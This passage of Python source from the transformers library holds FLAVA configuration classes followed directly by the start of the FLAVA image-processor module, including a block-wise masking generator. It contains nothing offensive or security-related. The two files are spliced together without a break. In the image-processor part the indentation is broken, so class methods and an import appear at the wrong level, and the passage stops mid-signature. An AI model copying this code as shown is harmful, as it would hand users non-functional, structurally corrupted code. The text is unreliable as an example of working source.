        use_cls_token: bool = True,
        **kwargs,
    ):
        super().__init__(**kwargs)

        self.hidden_size = hidden_size
        self.num_hidden_layers = num_hidden_layers
        self.num_attention_heads = num_attention_heads
        self.intermediate_size = intermediate_size
        self.hidden_act = hidden_act
        self.hidden_dropout_prob = hidden_dropout_prob
        self.attention_probs_dropout_prob = attention_probs_dropout_prob
        self.initializer_range = initializer_range
        self.layer_norm_eps = layer_norm_eps
        self.qkv_bias = qkv_bias
        self.use_cls_token = use_cls_token

    @classmethod
    def from_pretrained(cls, pretrained_model_name_or_path: Union[str, os.PathLike], **kwargs) -> "PretrainedConfig":
        """Load this config from a checkpoint, unwrapping the `multimodal_config` key when the
        checkpoint holds a composite `FlavaConfig`."""
        config_dict, kwargs = cls.get_config_dict(pretrained_model_name_or_path, **kwargs)

        # get the multimodal config dict if we are loading from FlavaConfig
        if config_dict.get("model_type") == "flava":
            config_dict = config_dict["multimodal_config"]

        if "model_type" in config_dict and hasattr(cls, "model_type") and config_dict["model_type"] != cls.model_type:
            logger.warning(
                f"You are using a model of type {config_dict['model_type']} to instantiate a model of type "
                f"{cls.model_type}. This is not supported for all configurations of models and can yield errors."
            )

        return cls.from_dict(config_dict, **kwargs)
class FlavaImageCodebookConfig(PretrainedConfig):
    r"""
    [`FlavaImageCodebookConfig`] is the configuration class to store the configuration of a [`FlavaImageCodebook`]. It
    is used to instantiate an FLAVA model according to the specified arguments, defining the model architecture.
    Instantiating a configuration with the defaults will yield a similar configuration to that of the FLAVA
    [facebook/flava-image-codebook](https://huggingface.co/facebook/flava-image-codebook) architecture.

    Configuration objects inherit from [`PretrainedConfig`] and can be used to control the model outputs. Read the
    documentation from [`PretrainedConfig`] for more information.

    Args:
        num_groups (`int`, defaults to 4):
            Number of groups to be created. This parameter as of now doesn't affect the model and is used for some
            internal calculation and estimations.
        input_channels (`int`, defaults to 3):
            Number of channels in the image to be passed.
        num_blocks_per_group (`int`, defaults to 2):
            Number of conv-based blocks per group.
        hidden_size (`int`, defaults to 256):
            Size of hidden dim for the blocks.
        vocab_size (`int`, defaults to 8192):
            Size of the output vocabulary for the codebook.
        freeze (`bool`, defaults to `True`):
            Whether to freeze the weights of the model.
        initializer_range (`float`, *optional*, defaults to 0.02):
            The standard deviation of the truncated_normal_initializer for initializing all weight matrices.
        kwargs (*optional*):
            Dictionary of keyword arguments.

    Example:

    ```python
    >>> from transformers import FlavaImageCodebookConfig, FlavaImageCodebook

    >>> # Initializing a FlavaImageCodebook with style configuration
    >>> configuration = FlavaImageCodebookConfig()

    >>> # Initializing a FlavaImageCodebook model (with random weights) from the style configuration
    >>> model = FlavaImageCodebook(configuration)
    >>> # Accessing the model configuration
    >>> configuration = model.config
    ```
    """

    # NOTE: the docstring above was previously placed *after* `model_type`, making it a no-op
    # string expression instead of the class docstring; it is now the first statement so Python
    # attaches it to `__doc__`.
    model_type = "flava_image_codebook"

    def __init__(
        self,
        num_groups: int = 4,
        input_channels: int = 3,
        num_blocks_per_group: int = 2,
        hidden_size: int = 256,
        vocab_size: int = 8192,
        freeze: bool = True,  # annotation fixed: this is a boolean flag, not an int
        initializer_range: float = 0.02,
        **kwargs,
    ):
        super().__init__(**kwargs)

        self.num_groups = num_groups
        self.input_channels = input_channels
        self.num_blocks_per_group = num_blocks_per_group
        self.hidden_size = hidden_size
        self.vocab_size = vocab_size
        self.freeze = freeze
        self.initializer_range = initializer_range

    @classmethod
    def from_pretrained(cls, pretrained_model_name_or_path: Union[str, os.PathLike], **kwargs) -> "PretrainedConfig":
        """Load this config from a checkpoint, unwrapping the `image_codebook_config` key when the
        checkpoint holds a composite `FlavaConfig`."""
        config_dict, kwargs = cls.get_config_dict(pretrained_model_name_or_path, **kwargs)

        # get the image codebook config dict if we are loading from FlavaConfig
        if config_dict.get("model_type") == "flava":
            config_dict = config_dict["image_codebook_config"]

        if "model_type" in config_dict and hasattr(cls, "model_type") and config_dict["model_type"] != cls.model_type:
            logger.warning(
                f"You are using a model of type {config_dict['model_type']} to instantiate a model of type "
                f"{cls.model_type}. This is not supported for all configurations of models and can yield errors."
            )

        return cls.from_dict(config_dict, **kwargs)
class FlavaConfig(PretrainedConfig):
    r"""
    [`FlavaConfig`] is the configuration class to store the configuration of a [`FlavaModel`]. It is used to
    instantiate FLAVA model according to the specified arguments, defining the text model, image model, image codebook
    and multimodal model configs. Instantiating a configuration with the defaults will yield a similar configuration to
    that of the FLAVA [facebook/flava-full](https://huggingface.co/facebook/flava-full) architecture.

    Configuration objects inherit from [`PretrainedConfig`] and can be used to control the model outputs. Read the
    documentation from [`PretrainedConfig`] for more information.

    Args:
        text_config (`dict`, *optional*):
            Dictionary of configuration options used to initialize [`FlavaTextConfig`].
        image_config (`dict`, *optional*):
            Dictionary of configuration options used to initialize [`FlavaImageConfig`].
        multimodal_config (`dict`, *optional*):
            Dictionary of configuration options used to initialize [`FlavaMultimodalConfig`].
        image_codebook_config (`dict`, *optional*):
            Dictionary of configuration options used to initialize [`FlavaImageCodebookConfig`].
        hidden_size (`int`, *optional*, defaults to 768):
            Dimensionality of the encoder layers and the pooler layer.
        layer_norm_eps (`float`, *optional*, defaults to 1e-12):
            The epsilon used by the layer normalization layers.
        projection_dim (`int`, *optional*, defaults to 768):
            Dimensionality of text and image projection layers.
        init_codebook (`bool`, *optional*, defaults to `True`):
            Whether to initialize the image codebook. The flag is only stored on the config here; it is
            consumed by the model.
        logit_scale_init_value (`float`, *optional*, defaults to 2.6592):
            The initial value of the *logit_scale* parameter. Default is used as per the original FLAVA/CLIP
            implementation.
        initializer_range (`float`, *optional*, defaults to 0.02):
            The standard deviation of the truncated_normal_initializer for initializing all weight matrices.
        ce_ignore_index (`int`, *optional*, defaults to -100):
            Cross entropy index to ignore.
        mim_weight (`float`, *optional*, defaults to 1.0):
            Weight to be assigned to MIM (Masked Image Modeling) unimodal loss.
        mlm_weight (`float`, *optional*, defaults to 1.0):
            Weight to be assigned to MLM (Masked Language Modeling) unimodal loss.
        global_contrastive_weight (`float`, *optional*, defaults to 1.0):
            Weight to be assigned to global contrastive cross-alignment loss.
        itm_weight (`float`, *optional*, defaults to 1.0):
            Weight to be assigned to image-text matching multimodal loss.
        mmm_image_weight (`float`, *optional*, defaults to 1.0):
            Weight to be assigned to MMM loss's image part.
        mmm_text_weight (`float`, *optional*, defaults to 1.0):
            Weight to be assigned to MMM loss's text part.
        global_backprop_contrastive (`bool`, *optional*, defaults to `True`):
            Whether to use global backpropagation through all workers in contrastive loss.
        skip_unmasked_multimodal_encoder (`bool`, *optional*, defaults to `True`):
            Whether to skip running unmasked multimodal encoder whose outputs are not used by FLAVA losses.
        return_loss (`bool`, *optional*, defaults to `True`):
            Whether to return loss or not.
        kwargs (*optional*):
            Dictionary of keyword arguments.

    Example:

    ```python
    >>> from transformers import FlavaConfig, FlavaModel, FlavaForPreTraining

    >>> # Initializing a FlavaConfig with style configuration
    >>> configuration = FlavaConfig()

    >>> # Initializing a FlavaModel and FlavaForPreTraining model (with random weights) from the style configuration
    >>> model = FlavaModel(configuration)
    >>> model_pre = FlavaForPreTraining(configuration)

    >>> # Accessing the model configuration
    >>> configuration = model.config
    >>> configuration_pre = model_pre.config
    ```
    """

    model_type = "flava"
    is_composition = True

    def __init__(
        self,
        image_config: Dict[str, Any] = None,
        text_config: Dict[str, Any] = None,
        multimodal_config: Dict[str, Any] = None,
        image_codebook_config: Dict[str, Any] = None,
        hidden_size: int = 768,
        layer_norm_eps: float = 1e-12,
        projection_dim: int = 768,
        init_codebook: bool = True,
        logit_scale_init_value: float = 2.6592,
        initializer_range: float = 0.02,
        ce_ignore_index: int = -100,
        mim_weight: float = 1.0,
        mlm_weight: float = 1.0,
        global_contrastive_weight: float = 1.0,
        itm_weight: float = 1.0,
        mmm_image_weight: float = 1.0,
        mmm_text_weight: float = 1.0,
        global_backprop_contrastive: bool = True,
        skip_unmasked_multimodal_encoder: bool = True,
        return_loss: bool = True,
        **kwargs,
    ):
        super().__init__(**kwargs)

        # If `_config_dict` exist, we use them for the backward compatibility.
        # These legacy `*_config_dict` kwargs take precedence over the plain `*_config` arguments.
        text_config_dict = kwargs.pop("text_config_dict", None)
        image_config_dict = kwargs.pop("vision_config_dict", None)
        multimodal_config_dict = kwargs.pop("multimodal_config_dict", None)
        image_codebook_config_dict = kwargs.pop("image_codebook_config_dict", None)
        if text_config_dict is not None:
            text_config = text_config_dict
        if image_config_dict is not None:
            image_config = image_config_dict
        if multimodal_config_dict is not None:
            multimodal_config = multimodal_config_dict
        if image_codebook_config_dict is not None:
            image_codebook_config = image_codebook_config_dict

        # Fall back to an empty dict so each sub-config below is built with its own defaults.
        if image_config is None:
            image_config = {}
            logger.info("image_config is None. initializing the FlavaImageConfig with default values.")
        if text_config is None:
            text_config = {}
            logger.info("text_config is None. Initializing the FlavaTextConfig with default values.")
        if multimodal_config is None:
            multimodal_config = {}
            logger.info("multimodal_config is None. initializing the FlavaMultimodalConfig with default values.")
        if image_codebook_config is None:
            image_codebook_config = {}
            logger.info(
                "image_codebook_config is None. initializing the FlavaImageCodebookConfig with default values."
            )

        self.image_config = FlavaImageConfig(**image_config)
        self.text_config = FlavaTextConfig(**text_config)
        self.multimodal_config = FlavaMultimodalConfig(**multimodal_config)
        self.image_codebook_config = FlavaImageCodebookConfig(**image_codebook_config)
        self.projection_dim = projection_dim
        self.init_codebook = init_codebook

        self.hidden_size = hidden_size
        self.layer_norm_eps = layer_norm_eps
        self.initializer_range = initializer_range
        self.logit_scale_init_value = logit_scale_init_value
        # Always 1.0; not exposed as a constructor argument.
        self.initializer_factor = 1.0
        self.ce_ignore_index = ce_ignore_index
        self.mim_weight = mim_weight
        self.mlm_weight = mlm_weight
        self.global_contrastive_weight = global_contrastive_weight
        self.itm_weight = itm_weight
        self.mmm_image_weight = mmm_image_weight
        self.mmm_text_weight = mmm_text_weight
        self.global_backprop_contrastive = global_backprop_contrastive
        self.skip_unmasked_multimodal_encoder = skip_unmasked_multimodal_encoder
        self.return_loss = return_loss

    @classmethod
    def from_configs(
        cls,
        image_config: FlavaImageConfig,
        text_config: FlavaTextConfig,
        multimodal_config: FlavaMultimodalConfig,
        image_codebook_config: FlavaImageCodebookConfig,
        **kwargs,
    ):
        r"""
        Instantiate a [`FlavaConfig`] (or a derived class) from flava text model configuration, flava image model
        configuration, flava multimodal model and flava codebook model configuration.

        Returns:
            [`FlavaConfig`]: An instance of a configuration object
        """
        return cls(
            image_config=image_config.to_dict(),
            text_config=text_config.to_dict(),
            multimodal_config=multimodal_config.to_dict(),
            image_codebook_config=image_codebook_config.to_dict(),
            **kwargs,
        )

    def to_dict(self):
        """
        Serializes this instance to a Python dictionary. Override the default [`~PretrainedConfig.to_dict`].

        Returns:
            `Dict[str, any]`: Dictionary of all the attributes that make up this configuration instance.
        """
        output = copy.deepcopy(self.__dict__)
        # Sub-configs live as objects on the instance; serialize each to a plain dict.
        output["image_config"] = self.image_config.to_dict()
        output["text_config"] = self.text_config.to_dict()
        output["multimodal_config"] = self.multimodal_config.to_dict()
        output["image_codebook_config"] = self.image_codebook_config.to_dict()
        output["model_type"] = self.__class__.model_type
        return output
# coding=utf-8
# Copyright 2022 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Image processor class for Flava."""
import math
import random
from functools import lru_cache
from typing import Any, Dict, Iterable, List, Optional, Tuple, Union
import numpy as np
from ...image_processing_utils import BaseImageProcessor, BatchFeature, get_size_dict
from ...image_transforms import center_crop, normalize, rescale, resize, to_channel_dimension_format
from ...image_utils import (
OPENAI_CLIP_MEAN,
OPENAI_CLIP_STD,
ChannelDimension,
ImageInput,
PILImageResampling,
make_list_of_images,
to_numpy_array,
valid_images,
)
from ...utils import TensorType, is_vision_available, logging
if is_vision_available():
import PIL
logger = logging.get_logger(__name__)
# These values are taken from CLIP
FLAVA_IMAGE_MEAN = OPENAI_CLIP_MEAN
FLAVA_IMAGE_STD = OPENAI_CLIP_STD
FLAVA_CODEBOOK_MEAN = [0.0, 0.0, 0.0]
FLAVA_CODEBOOK_STD = [1.0, 1.0, 1.0]
LOGIT_LAPLACE_EPS: float = 0.1
# Inspired from https://github.com/microsoft/unilm/blob/master/beit/masking_generator.py
class FlavaMaskingGenerator:
    """
    Generates block-wise patch masks for FLAVA's masked image modeling.

    Repeatedly samples rectangular groups of patches with bounded area and log-uniform aspect ratio, and
    accumulates them until roughly `total_mask_patches` patches are masked (it stops early if no further
    rectangle can be placed).

    Args:
        input_size (`int` or `Tuple[int, int]`, *optional*, defaults to 14):
            Height and width of the patch grid. An int is interpreted as a square grid.
        total_mask_patches (`int`, *optional*, defaults to 75):
            Target total number of masked patches.
        mask_group_max_patches (`int`, *optional*):
            Maximum number of patches a single group may mask. Defaults to `total_mask_patches` when `None`.
        mask_group_min_patches (`int`, *optional*, defaults to 16):
            Minimum area (in patches) of a sampled group.
        mask_group_min_aspect_ratio (`float`, *optional*, defaults to 0.3):
            Minimum aspect ratio of a sampled group. (Annotation fixed: was `Optional[float]` although the
            value is always used — passing `None` would crash on `1 / None`.)
        mask_group_max_aspect_ratio (`float`, *optional*):
            Maximum aspect ratio of a sampled group. Defaults to `1 / mask_group_min_aspect_ratio` when
            `None`. (Annotation fixed: was plain `float` despite the `None` default.)
    """

    def __init__(
        self,
        input_size: Union[int, Tuple[int, int]] = 14,
        total_mask_patches: int = 75,
        mask_group_max_patches: Optional[int] = None,
        mask_group_min_patches: int = 16,
        mask_group_min_aspect_ratio: float = 0.3,
        mask_group_max_aspect_ratio: Optional[float] = None,
    ):
        if not isinstance(input_size, tuple):
            input_size = (input_size,) * 2

        self.height, self.width = input_size
        self.num_patches = self.height * self.width
        self.total_mask_patches = total_mask_patches

        self.mask_group_min_patches = mask_group_min_patches
        self.mask_group_max_patches = total_mask_patches if mask_group_max_patches is None else mask_group_max_patches

        # Aspect ratios are sampled log-uniformly between the two bounds.
        mask_group_max_aspect_ratio = mask_group_max_aspect_ratio or 1 / mask_group_min_aspect_ratio
        self.log_aspect_ratio = (math.log(mask_group_min_aspect_ratio), math.log(mask_group_max_aspect_ratio))

    def __repr__(self):
        repr_str = "MaskingGenerator(%d, %d -> [%d ~ %d], max = %d, %.3f ~ %.3f)" % (
            self.height,
            self.width,
            self.mask_group_min_patches,
            self.mask_group_max_patches,
            self.total_mask_patches,
            self.log_aspect_ratio[0],
            self.log_aspect_ratio[1],
        )
        return repr_str

    def get_shape(self):
        """Return the `(height, width)` of the patch grid."""
        return self.height, self.width

    def _mask(self, mask, max_mask_patches):
        """
        Try to add one rectangular group of masked patches to `mask` in place.

        Makes up to 10 attempts to place a rectangle whose *newly* masked area is positive and at most
        `max_mask_patches`. Returns the number of patches flipped from 0 to 1 (0 if no placement succeeded).
        """
        delta = 0
        for _attempt in range(10):
            target_area = random.uniform(self.mask_group_min_patches, max_mask_patches)
            aspect_ratio = math.exp(random.uniform(*self.log_aspect_ratio))
            height = int(round(math.sqrt(target_area * aspect_ratio)))
            width = int(round(math.sqrt(target_area / aspect_ratio)))
            if width < self.width and height < self.height:
                top = random.randint(0, self.height - height)
                left = random.randint(0, self.width - width)

                num_masked = mask[top : top + height, left : left + width].sum()
                # Accept only if the rectangle adds new patches without exceeding the remaining budget.
                if 0 < height * width - num_masked <= max_mask_patches:
                    for i in range(top, top + height):
                        for j in range(left, left + width):
                            if mask[i, j] == 0:
                                mask[i, j] = 1
                                delta += 1

                if delta > 0:
                    break
        return delta

    def __call__(self):
        """Generate one mask: an int `np.ndarray` of shape `(height, width)` with entries in {0, 1}."""
        mask = np.zeros(shape=self.get_shape(), dtype=int)
        mask_count = 0
        while mask_count < self.total_mask_patches:
            # Never let one group exceed the remaining budget or the per-group cap.
            max_mask_patches = self.total_mask_patches - mask_count
            max_mask_patches = min(max_mask_patches, self.mask_group_max_patches)

            delta = self._mask(mask, max_mask_patches)
            if delta == 0:
                # No rectangle could be placed; stop rather than loop forever.
                break
            else:
                mask_count += delta

        return mask
class FlavaImageProcessor(BaseImageProcessor):
r"""
Constructs a Flava image processor.
Args:
do_resize (`bool`, *optional*, defaults to `True`):
Whether to resize the image's (height, width) dimensions to the specified `size`. Can be overridden by the
`do_resize` parameter in `preprocess`.
size (`Dict[str, int]` *optional*, defaults to `{"height": 224, "width": 224}`):
Size of the image after resizing. Can be overridden by the `size` parameter in `preprocess`.
resample (`PILImageResampling`, *optional*, defaults to `PILImageResampling.BICUBIC`):
Resampling filter to use if resizing the image. Can be overridden by the `resample` parameter in
`preprocess`.
do_center_crop (`bool`, *optional*, defaults to `True`):
Whether to center crop the images. Can be overridden by the `do_center_crop` parameter in `preprocess`.
crop_size (`Dict[str, int]` *optional*, defaults to `{"height": 224, "width": 224}`):
Size of image after the center crop `(crop_size["height"], crop_size["width"])`. Can be overridden by the
`crop_size` parameter in `preprocess`.
do_rescale (`bool`, *optional*, defaults to `True`):
Whether to rescale the image by the specified scale `rescale_factor`. Can be overridden by the `do_rescale`
parameter in `preprocess`.
rescale_factor (`int` or `float`, *optional*, defaults to `1/255`):
Scale factor to use if rescaling the image. Can be overridden by the `rescale_factor` parameter in
`preprocess`.
do_normalize (`bool`, *optional*, defaults to `True`):
Whether to normalize the image. Can be overridden by the `do_normalize` parameter in `preprocess`.
image_mean (`float` or `List[float]`, *optional*, defaults to `OPENAI_CLIP_MEAN`):
Mean to use if normalizing the image. This is a float or list of floats the length of the number of
channels in the image. Can be overridden by the `image_mean` parameter in the `preprocess` method.
image_std (`float` or `List[float]`, *optional*, defaults to `OPENAI_CLIP_STD`):
Standard deviation to use if normalizing the image. This is a float or list of floats the length of the
number of channels in the image. Can be overridden by the `image_std` parameter in the `preprocess` method.
return_image_mask (`bool`, *optional*, defaults to `False`):
Whether to return the image mask. Can be overridden by the `return_image_mask` parameter in `preprocess`.
input_size_patches (`int`, *optional*, defaults to 14):
Number of patches in the image in height and width direction. 14x14 = 196 total patches. Can be overridden
by the `input_size_patches` parameter in `preprocess`.
total_mask_patches (`int`, *optional*, defaults to 75):
Total number of patches that should be masked. Can be overridden by the `total_mask_patches` parameter in
`preprocess`.
mask_group_min_patches (`int`, *optional*, defaults to 16):
Minimum number of patches that should be masked. Can be overridden by the `mask_group_min_patches`
parameter in `preprocess`.
mask_group_max_patches (`int`, *optional*):
Maximum number of patches that should be masked. Can be overridden by the `mask_group_max_patches`
parameter in `preprocess`.
mask_group_min_aspect_ratio (`float`, *optional*, defaults to 0.3):
Minimum aspect ratio of the mask window. Can be overridden by the `mask_group_min_aspect_ratio` parameter
in `preprocess`.
mask_group_max_aspect_ratio (`float`, *optional*):
Maximum aspect ratio of the mask window. Can be overridden by the `mask_group_max_aspect_ratio` parameter
in `preprocess`.
codebook_do_resize (`bool`, *optional*, defaults to `True`):
    Whether to resize the input for codebook to a certain `codebook_size`. Can be overridden by the
    `codebook_do_resize` parameter in `preprocess`.
codebook_size (`Dict[str, int]`, *optional*, defaults to `{"height": 112, "width": 112}`):
Resize the input for codebook to the given size. Can be overridden by the `codebook_size` parameter in
`preprocess`.
codebook_resample (`PILImageResampling`, *optional*, defaults to `PILImageResampling.LANCZOS`):
Resampling filter to use if resizing the codebook image. Can be overridden by the `codebook_resample`
parameter in `preprocess`.
codebook_do_center_crop (`bool`, *optional*, defaults to `True`):
Whether to crop the input for codebook at the center. If the input size is smaller than
`codebook_crop_size` along any edge, the image is padded with 0's and then center cropped. Can be
overridden by the `codebook_do_center_crop` parameter in `preprocess`.
codebook_crop_size (`Dict[str, int]`, *optional*, defaults to `{"height": 112, "width": 112}`):
Desired output size for codebook input when applying center-cropping. Can be overridden by the
`codebook_crop_size` parameter in `preprocess`.
codebook_do_rescale (`bool`, *optional*, defaults to `True`):
Whether to rescale the input for codebook by the specified scale `codebook_rescale_factor`. Can be
overridden by the `codebook_do_rescale` parameter in `preprocess`.
codebook_rescale_factor (`int` or `float`, *optional*, defaults to `1/255`):
Defines the scale factor to use if rescaling the codebook image. Can be overridden by the
`codebook_rescale_factor` parameter in `preprocess`.
codebook_do_map_pixels (`bool`, *optional*, defaults to `True`):
Whether to map the pixel values of the codebook input to (1 - 2e)x + e. Can be overridden by the
`codebook_do_map_pixels` parameter in `preprocess`.
codebook_do_normalize (`bool`, *optional*, defaults to `True`):
Whether or not to normalize the input for codebook with `codebook_image_mean` and `codebook_image_std`. Can
be overridden by the `codebook_do_normalize` parameter in `preprocess`.
codebook_image_mean (`Optional[Union[float, Iterable[float]]]`, *optional*, defaults to `[0, 0, 0]`):
The sequence of means for each channel, to be used when normalizing images for codebook. Can be overridden
by the `codebook_image_mean` parameter in `preprocess`.
codebook_image_std (`Optional[Union[float, Iterable[float]]]`, *optional*, defaults to `[1.0, 1.0, 1.0]`):
The sequence of standard deviations for each channel, to be used when normalizing images for codebook. Can
be overridden by the `codebook_image_std` parameter in `preprocess`.
"""
model_input_names = ["pixel_values"]
def __init__(
    self,
    do_resize: bool = True,
    size: Dict[str, int] = None,
    resample: PILImageResampling = PILImageResampling.BICUBIC,
    do_center_crop: bool = True,
    crop_size: Dict[str, int] = None,
    do_rescale: bool = True,
    rescale_factor: Union[int, float] = 1 / 255,
    do_normalize: bool = True,
    image_mean: Optional[Union[float, Iterable[float]]] = None,
    image_std: Optional[Union[float, Iterable[float]]] = None,
    # Mask related params
    return_image_mask: bool = False,
    input_size_patches: int = 14,
    total_mask_patches: int = 75,
    mask_group_min_patches: int = 16,
    mask_group_max_patches: Optional[int] = None,
    mask_group_min_aspect_ratio: float = 0.3,
    mask_group_max_aspect_ratio: Optional[float] = None,
    # Codebook related params
    return_codebook_pixels: bool = False,
    codebook_do_resize: bool = True,
    codebook_size: Dict[str, int] = None,  # annotation fixed: was `bool`
    codebook_resample: int = PILImageResampling.LANCZOS,
    codebook_do_center_crop: bool = True,
    codebook_crop_size: Dict[str, int] = None,  # annotation fixed: was `int`
    codebook_do_rescale: bool = True,
    codebook_rescale_factor: Union[int, float] = 1 / 255,
    codebook_do_map_pixels: bool = True,
    codebook_do_normalize: bool = True,
    codebook_image_mean: Optional[Union[float, Iterable[float]]] = None,
    codebook_image_std: Optional[Union[float, Iterable[float]]] = None,
    **kwargs,
) -> None:
    """
    Store all preprocessing parameters on the instance (see the class docstring for their meaning), filling in
    defaults where arguments are `None`, and forward remaining kwargs to the base image processor.
    """
    super().__init__(**kwargs)
    # Apply the documented defaults, then normalize every size argument to a {"height", "width"} dict.
    size = size if size is not None else {"height": 224, "width": 224}
    size = get_size_dict(size)
    crop_size = crop_size if crop_size is not None else {"height": 224, "width": 224}
    crop_size = get_size_dict(crop_size, param_name="crop_size")
    codebook_size = codebook_size if codebook_size is not None else {"height": 112, "width": 112}
    codebook_size = get_size_dict(codebook_size, param_name="codebook_size")
    codebook_crop_size = codebook_crop_size if codebook_crop_size is not None else {"height": 112, "width": 112}
    codebook_crop_size = get_size_dict(codebook_crop_size, param_name="codebook_crop_size")

    self.do_resize = do_resize
    self.size = size
    self.resample = resample
    self.do_rescale = do_rescale
    self.rescale_factor = rescale_factor
    self.do_center_crop = do_center_crop
    self.crop_size = crop_size
    self.do_normalize = do_normalize
    # FLAVA normalizes with the CLIP statistics by default.
    self.image_mean = image_mean if image_mean is not None else FLAVA_IMAGE_MEAN
    self.image_std = image_std if image_std is not None else FLAVA_IMAGE_STD

    self.return_image_mask = return_image_mask
    self.input_size_patches = input_size_patches
    self.total_mask_patches = total_mask_patches
    self.mask_group_min_patches = mask_group_min_patches
    self.mask_group_max_patches = mask_group_max_patches
    self.mask_group_min_aspect_ratio = mask_group_min_aspect_ratio
    self.mask_group_max_aspect_ratio = mask_group_max_aspect_ratio

    self.return_codebook_pixels = return_codebook_pixels
    self.codebook_do_resize = codebook_do_resize
    self.codebook_size = codebook_size
    self.codebook_resample = codebook_resample
    self.codebook_do_center_crop = codebook_do_center_crop
    self.codebook_crop_size = codebook_crop_size
    self.codebook_do_rescale = codebook_do_rescale
    self.codebook_rescale_factor = codebook_rescale_factor
    self.codebook_do_map_pixels = codebook_do_map_pixels
    self.codebook_do_normalize = codebook_do_normalize
    # Fix: the original assigned `self.codebook_image_mean` twice in a row; one conditional assignment
    # suffices and is what the second (effective) line already did.
    self.codebook_image_mean = codebook_image_mean if codebook_image_mean is not None else FLAVA_CODEBOOK_MEAN
    self.codebook_image_std = codebook_image_std if codebook_image_std is not None else FLAVA_CODEBOOK_STD
@classmethod
def from_dict(cls, image_processor_dict: Dict[str, Any], **kwargs):
    """
    Overrides the `from_dict` method from the base class to make sure parameters are updated if image processor is
    created using from_dict and kwargs e.g. `FlavaImageProcessor.from_pretrained(checkpoint, codebook_size=600)`
    """
    image_processor_dict = image_processor_dict.copy()
    # These keys may arrive as kwargs and must override the serialized values before the base class runs.
    for override_key in ("codebook_size", "codebook_crop_size"):
        if override_key in kwargs:
            image_processor_dict[override_key] = kwargs.pop(override_key)
    return super().from_dict(image_processor_dict, **kwargs)
@lru_cache()
def masking_generator(
    self,
    input_size_patches,
    total_mask_patches,
    mask_group_min_patches,
    mask_group_max_patches,
    mask_group_min_aspect_ratio,
    mask_group_max_aspect_ratio,
) -> FlavaMaskingGenerator:
    """
    Build (and memoize) a `FlavaMaskingGenerator` for the given masking parameters.

    All arguments are forwarded unchanged to the `FlavaMaskingGenerator` constructor; `lru_cache` reuses the
    same generator instance across calls with identical parameters.

    NOTE(review): `lru_cache` on an instance method keys the cache on `self` and keeps the processor instance
    alive for the cache's lifetime — presumably acceptable for long-lived processors, but worth confirming.
    """
    return FlavaMaskingGenerator(
        input_size=input_size_patches,
        total_mask_patches=total_mask_patches,
        mask_group_min_patches=mask_group_min_patches,
        mask_group_max_patches=mask_group_max_patches,
        mask_group_min_aspect_ratio=mask_group_min_aspect_ratio,
        mask_group_max_aspect_ratio=mask_group_max_aspect_ratio,
    )
def resize(
    self,
    image: np.ndarray,
    size: Dict[str, int],
    resample: PILImageResampling = PILImageResampling.BICUBIC,
    data_format: Optional[Union[str, ChannelDimension]] = None,
    **kwargs,
) -> np.ndarray:
    """
    Resize an image to `(size["height"], size["width"])`.

    Args:
        image (`np.ndarray`):
            Image to resize.
        size (`Dict[str, int]`):
            Size of the output image. Must contain `height` and `width` keys after normalization.
        resample (`PILImageResampling`, *optional*, defaults to `PILImageResampling.BICUBIC`):
            Resampling filter to use when resizing the image.
        data_format (`str` or `ChannelDimension`, *optional*):
            The channel dimension format of the image. If not provided, it will be the same as the input image.

    Raises:
        ValueError: If `size` is missing the `height` or `width` key.
    """
    # Normalize any accepted size format into a {"height", "width"} dict before validating.
    size = get_size_dict(size)
    if "height" not in size or "width" not in size:
        raise ValueError(f"The size dictionary must contain 'height' and 'width' keys. Got {size.keys()}")
    return resize(
        image, size=(size["height"], size["width"]), resample=resample, data_format=data_format, **kwargs
    )
def center_crop(
    self,
    image: np.ndarray,
    size: Dict[str, int],
    data_format: Optional[Union[str, ChannelDimension]] = None,
    **kwargs,
) -> np.ndarray:
    """
    Center crop an image to `(size["height"], size["width"])`. If the input size is smaller than `crop_size` along
    any edge, the image is padded with 0's and then center cropped.

    Args:
        image (`np.ndarray`):
            Image to center crop.
        size (`Dict[str, int]`):
            Size of the output image.
        data_format (`str` or `ChannelDimension`, *optional*):
            The channel dimension format of the image. If not provided, it will be the same as the input image.
    """
    size = get_size_dict(size)
    # Validate that normalization produced both required keys.
    if not {"height", "width"} <= size.keys():
        raise ValueError(f"The size dictionary must contain 'height' and 'width' keys. Got {size.keys()}")
    output_size = (size["height"], size["width"])
    return center_crop(image, size=output_size, data_format=data_format, **kwargs)
def rescale(
    self,
    image: np.ndarray,
    scale: Union[int, float],
    data_format: Optional[Union[str, ChannelDimension]] = None,
    **kwargs,
):
    """
    Rescale an image by a scale factor. image = image * scale.

    Args:
        image (`np.ndarray`):
            Image to rescale.
        scale (`int` or `float`):
            Scale to apply to the image.
        data_format (`str` or `ChannelDimension`, *optional*):
            The channel dimension format of the image. If not provided, it will be the same as the input image.
    """
    # Thin wrapper around the shared `image_transforms.rescale` helper.
    return rescale(image, scale=scale, data_format=data_format, **kwargs)
def normalize(
    self,
    image: np.ndarray,
    mean: Union[float, List[float]],
    std: Union[float, List[float]],
    data_format: Optional[Union[str, ChannelDimension]] = None,
    **kwargs,
) -> np.ndarray:
    """
    Normalize an image. image = (image - mean) / std.

    Args:
        image (`np.ndarray`):
            Image to normalize.
        mean (`float` or `List[float]`):
            Image mean.
        std (`float` or `List[float]`):
            Image standard deviation.
        data_format (`str` or `ChannelDimension`, *optional*):
            The channel dimension format of the image. If not provided, it will be the same as the input image.
    """
    # Thin wrapper around the shared `image_transforms.normalize` helper.
    return normalize(image, mean=mean, std=std, data_format=data_format, **kwargs)
def map_pixels(self, image: np.ndarray) -> np.ndarray:
    """Apply the affine map `(1 - 2 * LOGIT_LAPLACE_EPS) * image + LOGIT_LAPLACE_EPS`. For pixel values in
    [0, 1] this compresses them into [LOGIT_LAPLACE_EPS, 1 - LOGIT_LAPLACE_EPS] for the codebook input."""
    return (1 - 2 * LOGIT_LAPLACE_EPS) * image + LOGIT_LAPLACE_EPS
def _preprocess_image(
    self,
    image: ImageInput,
    do_resize: bool = None,
    size: Dict[str, int] = None,
    resample: PILImageResampling = None,
    do_center_crop: bool = None,
    crop_size: Dict[str, int] = None,
    do_rescale: bool = None,
    rescale_factor: float = None,
    do_normalize: bool = None,
